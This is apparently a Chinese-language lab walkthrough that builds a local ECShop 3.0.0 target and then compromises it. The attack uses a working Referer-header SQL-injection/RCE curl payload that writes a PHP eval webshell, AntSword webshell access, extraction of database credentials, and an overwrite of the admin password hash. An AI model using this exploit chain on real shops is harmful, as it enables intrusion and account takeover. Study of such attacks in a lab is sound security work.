实验环境

Kali

CentOs

一、靶场搭建

CentOsIP地址192.168.64.159

#关闭centos防火墙
[root@localhost ~]# systemctl disable --now firewalld#关闭  selinux
[root@localhost ~]#  sed -i 's/SELINUX=enforcing/SELINUX=disabled/g' /etc/selinux/config#重启
[root@localhost ~]#reboot

注：sed 命令是将/etc/selinux/config 文件中的 SELINUX=enforcing 替换成SELINUX=disabled。

修改完需要重启，才能生效

安装 LAMP 环境

[root@localhost ~]# yum -y install httpd mariadb-server mariadb php php-mysql php-gd php-mbstring

修改配置文件httpd.conf

[root@localhost ~]# vim /etc/httpd/conf/httpd.conf

改：95  #ServerName www.example.com:80
新：95：ServerName loaclhost:80
改：164     DirectoryIndex index.html
新：164     DirectoryIndex index.html index.php

wq保存退出

#启动httpd服务
[root@localhost ~]# systemctl enable httpd --now
Created symlink from /etc/systemd/system/multi-user.target.wants/httpd.service to /usr/lib/systemd/system/httpd.service.
#启动mariadb服务
[root@localhost ~]# systemctl enable mariadb --now
Created symlink from /etc/systemd/system/multi-user.target.wants/mariadb.service to /usr/lib/systemd/system/mariadb.service.
#设置数据库账号密码
[root@localhost ~]# mysqladmin -u root password  
New password: qwe@@@123456789AAAAAAAAA
Confirm new password: qwe@@@123456789AAAAAAAAA

上传 ecshop 到 linux 主机并解压到网站目录下

#上传
[root@localhost ~]# rz -bey#解压
[root@localhost ~]# unzip ecshop.zip#移动
[root@localhost ~]# mv ecshop/* /var/www/html#给apache用户分配网站的只读权限
[root@localhost ~]# chown -R apache:apache /var/www/html/

Kali 中修改 hosts 文件，加入如下记录

192.168.64.159 www.jd.com.abcgood123.com

浏览器打开http://www.jd.com.abcgood123.com/install/index.php

一直同意，下一步，直到配置系统界面

使用之前配置的数据库账户：root 密码是：qwe@@@123456789AAAAAAAAA

配置一个网站管理员账户：admin 密码是: qwer123456

安装完成后，前往后台管理中心，输入网站管理员用户名，密码，配置一些基本信息

系统设置-支付方式-银行汇款/转帐-编辑

系统设置-配送方式-顺丰速运-安装-设置区域-新建配送区域

删除没有用的的文件：

[root@xuegod63 html]# cd /var/www/html/
[root@xuegod63 html]# mv install/ /opt/
[root@xuegod63 html]# mv demo/ /opt/

二、开始信息收集，寻找漏洞

kali修改host文件

┌──(root㉿kali)-[~]
└─#  vim   /etc/hosts

访问网站，注册账号

打开网站首页，在网页源代码中可以获取到网站框架

whatweb命令可以看到服务器类型，php版本等信息

┌──(root㉿kali)-[~]
└─# whatweb http://www.jd.com.abcgood123.com/
http://www.jd.com.abcgood123.com/ [200 OK] Apache[2.4.6], Cookies[ECS[visit_times],ECS_ID], Country[RESERVED][ZZ], ECShop[3.0.0], HTTPServer[CentOS][Apache/2.4.6 (CentOS) PHP/5.4.16], IP[192.168.64.159], JQuery[1.11.3], MetaGenerator[ECSHOP v3.0.0], PHP[5.4.16], PoweredBy[ECShop], Script[text/javascript], Title[ECSHOP演示站 - Powered by ECShop], X-Powered-By[PHP/5.4.16] 

漏洞可以使用搜索引擎进行搜索

三、使用蚁剑连接后门程序

利用 payload 写入一句话并使用蚁剑连接上传 webshell

curl http://www.jd.com.abcgood123.com/user.php \
-d "action=login&vulnspy=eval/**/(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbCgkX1JFUVVFU1RbdnVsbnNweV0pOycpOw));exit;" \
-H 'Referer: 45ea207d7a2b68c49582d2d22adf953aads|a:3:{s:3:"num";s:207:"*/ select 1,0x2720756e696f6e2f2a,3,4,5,6,7,8,0x7b247b2476756c6e737079275d3b6576616c2f2a2a2f286261736536345f6465636f646528275a585a686243676b5831425055315262646e5673626e4e77655630704f773d3d2729293b2f2f7d7d,0--";s:2:"id";s:9:"'"'"' union/*";s:4:"name";s:3:"ads";}45ea207d7a2b68c49582d2d22adf953a'

这段代码是一个使用cURL工具向目标网站发送POST请求的示例。cURL是一个用于传输数据的命令行工具，支持多种协议，如HTTP、FTP等。

这段代码的主要功能是向网站发送一个POST请求，并传递两个参数：action和vulnspy。

• “action=login”：设置action参数为login，这个参数可能是用来标识用户想要执行的操作。
• “vulnspy=eval/**/(base64_decode(ZmlsZV9wdXRfY29udGVudHMoJ3Z1bG5zcHkucGhwJywnPD9waHAgZXZhbCgkX1JFUVVFU1RbdnVsbnNweV0pOycpOw));exit;”：
• 括号里面的是经过base64解码的 file_put_contents('vulnspy.php','<?php eval($_REQUEST[vulnspy]);'); 语句，使用file_put_contents函数将一段PHP代码写入名为vulnspy.php的文件中。这段代码包含一个PHP代码块，这个代码块会在运行时执行传入的vulnspy变量。
• eval($_REQUEST[vulnspy]);：这是一个PHP函数，用于执行传入的PHP代码。在这个例子中，vulnspy是一个变量，它的值应该是一段PHP代码。当这段代码被执行时，它会执行vulnspy变量中的PHP代码。
• Referer字段中携带了sql注入。

使用 rz 命令上传AntSword-Loader-v4.0.3-linux-x64.zip、antSword- master.zip 和 webshell2.php到Kali

┌──(root㉿kali)-[~]
└─# rz -bey
┌──(root㉿kali)-[~]
└─# unzip AntSword-Loader-v4.0.3-linux-x64.zip
┌──(root㉿kali)-[~]
└─# unzip antSword-master.zip

启动蚁剑加载器

┌──(root㉿kali)-[~]
└─# cd AntSword-Loader-v4.0.3-linux-x64 ┌──(root㉿kali)-[~/AntSword-Loader-v4.0.3-linux-x64]
└─# ./AntSword   

首次打开加载器时，界面如下图所示：

点击「初始化」按钮，进入到antSword-master文件夹中，点击右下方OK

重新打开蚁剑加载器，即可看到蚁剑的主界面。在空白处单击鼠标右键，点击 添加数据

URL 地址：http://www.jd.com.abcgood123.com/vulnspy.php

连接密码：vulnspy

点击添加

双击点开我们添加的地址进入到网站目录中，上传功能更强大的木马文件 webshell2.php 到 temp 目录下

浏览器打开http://www.jd.com.abcgood123.com/temp/webshell2.php进入到webshell窗口

四、使用webshell查看数据库信息

找到config.php 然后点右边的edit 打开文件

可以看到数据库信息

连接数据库

找到admin_user数据库

可以看到靶场的管理员信息

密码使用了md5加密，Salt就是盐，盐就是一个随机生成的字符串。简而言之，加盐是为了增加密码的安全性。密码使用了MD5加密，而盐则是一个随机生成的字符串。在密码存储时，系统将盐与原始密码连接在一起，然后对连接后的字符串进行加密。由于盐是系统随机生成的且每个用户的盐不同，即使两个用户使用相同的密码，其散列值也是不同的。这样做可以防止黑客通过散列值字典等方式破解密码。

具体操作上，用户在首次提供密码（通常是注册时），系统会自动添加一些盐，然后进行散列。当用户登录时，系统会为用户提供的密码添加相同的盐，再进行散列，最后比较散列值以确定密码是否正确。这种方式提高了密码的安全性，因为即使攻击者获得了一个用户的散列值，由于盐的存在，无法直接在字典中查找对应的密码。

记录下来pwd和salt

pwd：5ac84bb56649b2eac8e0f56d0afe5152 
salt：9044

可以利用自己生成的散列值来替换原本密码的散列值

┌──(root㉿kali)-[~]
└─# echo -n 123456|md5sum
e10adc3949ba59abbe56e057f20f883e  -
#利用php语言输出加盐后的散列值
[root@xuegod63 ~]# php -r 'echo md5("e10adc3949ba59abbe56e057f20f883e"."9044");'
d7cdb1e266cd7e920683b27eaa190fba

回到webshell，SQL语句替换，点击查询

update xo_admin_user  set  password ="d7cdb1e266cd7e920683b27eaa190fba" where user_id =1

五、进入网站后台

开始扫描 网站后台地址：

┌──(root㉿kali)-[~]
└─# dirb http://www.jd.com.abcgood123.com -o jd.com.txt ┌──(root㉿kali)-[~]
└─# vim jd.com.txt  

点击第一个，跳转到了后台登录界面，输入数据库获取的用户名admin以及自己设置的密码123456，成功进入后台